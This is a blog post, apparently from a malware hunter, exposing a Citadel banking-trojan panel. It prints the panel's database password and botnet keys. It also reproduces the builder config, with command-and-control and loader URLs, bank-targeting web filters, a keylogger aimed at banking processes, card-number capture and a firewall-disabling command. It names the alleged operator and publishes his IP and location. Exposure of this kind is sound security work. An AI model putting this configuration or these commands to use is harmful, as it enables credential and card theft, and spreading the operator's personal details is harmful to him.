Pages

Sunday, January 4, 2015

Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed 



// config.php
$config = array (
  'mysql_host' => 'localhost',
  'mysql_user' => 'root',
  'mysql_pass' => 'qwerty23456@',
  'mysql_db' => 'tenna',
  'reports_path' => '_reports1190699691',
  'reports_to_db' => 1,
  'reports_to_fs' => 0,
  'reports_geoip' => 0,
  'jabber' => 
  array (
    'host' => '',
    'login' => '',
    'pass' => '',
    'port' => 5222,
  ),
  'reports_jn' => 0,
  'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
  ),
  'allowed_countries_enabled' => 0,
  'allowed_countries' => '',
  'botnet_timeout' => 1500,
  'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;



config.txt / from builder
entry "StaticConfig"
  botnet "CIT"
  timer_config 4 9
  timer_logs 3 6
  timer_stats 4 8
  timer_modules 1 4
  timer_autoupdate 8
  url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
  
  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  encryption_key "jzhbfgjdhbgjhddkjgskdj"
  report_software 1
  enable_luhn10_get 0
  enable_luhn10_post  1
  disable_antivirus 0
  use_module_video 1
  antiemulation_enable 0
  disable_httpgrabber 0
  use_module_ffcookie 1
end
entry "DynamicConfig"
  url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
  url_server "http://richyadams.zapto.org/xampp/link/gate.php"
  file_webinjects "injects.txt"
  url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
  entry "AdvancedConfigs"
    "http://richyadams.zapto.org/xampp/link/config.bin"
 "http://richyadams.zapto.org/xampp/link/config.bin"
  end
  entry "WebFilters"
    "#*wellsfargo.com/*"
    "@*payment.com/*"
    "!http://*.com/*.jpg"
  end
  entry HttpVipUrls
    "*facebook.com/*"
  end
  entry "WebDataFilters"
  end
  entry "WebFakes"
  end
  entry "CmdList"
    "hostname"
    "tasklist"
    "ipconfig /all"
 "netsh firewall set opmode disable"
  end
  entry "Keylogger"
    processes "bank.exe;java.exe"
    time 3
  end
  entry "Video"
    quality 1
    length 600
  end
end

Not many bots Richy ..

 // Here is the admin ip address !
41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"




He's location based on the ip
and here is a pic of him




luv ur pix too !!
Posted by at
Labels: , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)